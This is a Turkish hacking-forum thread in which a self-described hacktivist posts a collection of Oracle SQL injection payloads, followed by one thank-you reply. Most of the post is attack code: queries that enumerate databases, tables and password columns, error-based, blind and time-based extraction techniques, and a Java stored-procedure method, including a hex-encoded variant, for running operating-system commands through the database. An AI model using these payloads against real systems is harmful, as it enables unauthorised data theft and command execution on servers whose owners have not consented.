Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Oracle SQL Enjeksiyon Payload Örnekleri
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,378 / 1,378
Deneyim: 13 / 100
Rep Sayısı: 2791
Mesaj Sayısı: 6399
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
Oracle SQL Enjeksiyon Payload Örnekleri
10.02.2019 14:54
# Oracle SQL Injection Payload Örnekleri
***********************************
Author : KingSkrupellos
Team : Cyberizm Digital Security Team

## Oracle SQL version

Kod:
```sql
SELECT user FROM dual UNION SELECT * FROM v$version
```

## Oracle SQL database name

Kod:
```sql
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```

## Oracle SQL List Databases

Kod:
```sql
SELECT DISTINCT owner FROM all_tables;
```

## Oracle SQL List Column

Kod:
```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
```

## Oracle SQL List Tables

Kod:
```sql
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
```

## Oracle SQL Error based

Kod:
| Description  | Query  |
| :------------- | :------------- |
| Invalid HTTP Request  | SELECT utl_inaddr.get_host_name((select banner from v$version where rownum=1)) FROM dual |
| CTXSYS.DRITHSX.SN     | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual |
| Invalid XPath         | SELECT ordsys.ord_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual |
| Invalid XML           | SELECT to_char(dbms_xmlgen.getxml('select "'||(select user from sys.dual)||'" FROM sys.dual')) FROM dual |
| Invalid XML           | SELECT rtrim(extract(xmlagg(xmlelement("s", username || ',')),'/s').getstringval(),',') FROM all_users |

## Oracle SQL Blind

Kod:
| Description | Query |
| :------------- | :------------- |
| Version is 12.2           | SELECT COUNT(*) FROM v$version WHERE banner LIKE 'Oracle%12.2%'; |
| Subselect is enabled     | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual) |
| Table log_table exists | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log_table); |
| Column message exists in table log_table | SELEC COUNT(*) FROM user_tab_cols WHERE column_name = 'MESSAGE' AND table_name = 'LOG_TABLE'; |
| First letter of first message is t | SELEC message FROM log_table WHERE rownum=1 AND message LIKE 't%'; |

## Oracle SQL Time based

Kod:
```sql
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
```

## Oracle SQL Command execution

Kod:
```sql
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */

Kod:
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```

or (hex encoded)

Kod:
```sql
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420​636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c222061732069​6d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b707562​6c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b42​75666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e​657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528​292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e6720​7374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c69​6e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f​736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b726574​75726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e63​74696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475​726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574​696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b​'')); end;')) results FROM dual

/* run OS command */

Kod:
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```
___________________________________________________

$$$$$$$$$$ THE END $$$$$$$$$

We don't care what people think about us, we are proud of us, we not gonna change for anyone. I do not have own no website. No Contact. # KingSkrupellos # Cyberizm Digital Security Technological Turkish Moslem Army.



Alinti
#Ayar
*
avatar
Tabutçu
Durum: Çevrimdışı
Seviye Puanı: 35
Yaşam Puanı: 791 / 869
Deneyim: 78 / 100
Rep Sayısı: 1534
Mesaj Sayısı: 1838
Üyelik Tarihi: 13.08.2013
      
Yorum: #2
RE: Oracle SQL Enjeksiyon Payload Örnekleri
11.02.2019 11:42
Teşekkürler, Emeğine Sağlık Smile

Başka forumlarda üyeliğim bulunmamaktadır.
ayar
Alinti



1 Ziyaretçi